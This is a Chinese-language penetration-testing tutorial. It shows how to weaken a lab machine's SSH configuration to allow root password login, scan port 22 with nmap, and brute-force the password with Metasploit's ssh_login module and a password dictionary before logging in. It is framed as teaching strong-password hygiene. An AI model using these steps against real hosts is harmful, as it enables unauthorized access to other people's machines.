白帽子黑客给你演示:设置一个复杂强壮安全的SSH密码有多么重要!
课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali与编程,学习更多网络攻防干货!
一、知识点详解:SSH服务
1、概念:SSH服务是专为远程登录会话和其他网络服务提供安全性协议。
2、作用:通过对SSH服务进行扫描及密码破解远程登录到受害者计算机
3、条件:受害者计算机需开启SSH服务
二、操作详解一:实验条件准备
1、攻击方和受害方需要处于同一网段,即同处于一个局域网内。
2、受害者计算机修改SSH服务配置文件。
在受害者计算机终端中输入:vi /etc/ssh/sshd_config,打开SSH服务的配置文件。
在配置文件中我们需要对password的有关部分进行修改,可通过输入/pass回车搜索相关的字段,通过按下n进行切换到带有“pass”下一个字段。
直到找到#PermitRootLogin prohibit-password,将其改为PermitRootLogin yes,目的是允许root登录,具体操作为:光标移动到该段代码上,按下yy进行复制该行,之后将光标移动到代码末尾,回车另起一行,按下p将其粘贴下来,移动光标删除#号,解除注释,删除prohibit-password,按下i进入插入模式(具体可百度vim文本编辑器的使用),输入yes。
继续找到#PassWordAuthentication yes,去掉注释,按下:(冒号键)输入wq,表示存盘退出。
附:Vim编辑器的使用:
进入vi之后,是处于「命令行模式(command mode)」,要切换到「插入模式(Insertmode)」才能够输入文字。切换至插入模式(Insert mode)编辑文件
在「命令行模式(command mode)」下按一下字母「i」就可以进入「插入模式(Insert mode)」,这时候你就可以开始输入文字了。
按一下「ESC」键转到「命令行模式(command mode)」
退出vi及保存文件
在「命令行模式(command mode)」下,按一下「:」冒号键进入「Last line mode」,例如:
: w filename (输入 「w filename」将文章以指定的文件名filename保存)
: wq (输入「wq」,存盘并退出vi)
: q! (输入q!, 不存盘强制退出vi)
3、受害者计算机开启SSH服务
在受害者计算机终端输入service ssh status,查看ssh服务的状态
继续在终端输入service ssh start 开启SSH服务
此时再输入service ssh status查看状态,会发现SSH服务已经开启
因为SSH服务对应的端口是22,所以此时用攻击端进行扫描时,会发现受害者的22号端口开放,在攻击端终端输入nmap -p 22 -sV 192.168.78.162(对应的受害者ip号,也可通过nmap进行批量扫描,具体请看nmap使用篇)
至此,受害者实验环境搭建完成。在真实情况下,往往我们只需要使用nmap进行批量扫描,全凭运气,如果有开启ssh服务的主机才能进行下一步。
三、操作详解二:攻击端进行密码破解
1、启动msfconsole
在攻击端终端输入msfconsole即可
2、在msfconsole选择对应模块进行攻击
2.1输入search ssh_login,搜索对应模块。
2.2输入use auxiliary/scanner/ssh/ssh_login。
2.3输人show options,查看需要设置的信息
3、设置相关信息
3.1输入set rhosts 受害者Ip号
3.2输入set username 受害者主机用户名
PS:真实情况下,该主机名需要我们进行信息收集或者暴力匹配得到,本实验侧重于破解密码,不对此进行过多阐述。
3.3输入set pass_file 密码字典文件路径
PS:该字典文件可以是从网上下载的,也可以是自己写的,该密码字典文件中有一定要有正确的密码,破解的原理就是使用字典文件中的密码,一个一个的暴力匹配。
3.4输入set thread 线程数,用于进行破解密码的线程个数
3.5输入show options,再次查看设置的信息是否完全
4、攻击并登陆
4.1输入run,进行攻击,等待攻击结果
4.2成功后,使用ssh进行登录,输入ssh 用户名@受害者ip地址
4.3输入破解出来的正确密码
至此,我们就登录到了受害者的主机中,就可以使用相关命令,在受害者计算机中进行一系列的操作。
本教程仅做学习交流使用,请自觉遵守网络安全法,更多技术干货,请持续关注Kali与编程。
辛苦原创,各位看官记得好评加关注哦!你也可搜索:Kali与编程,学习更多Kali Linux渗透与白帽编程技巧哦!
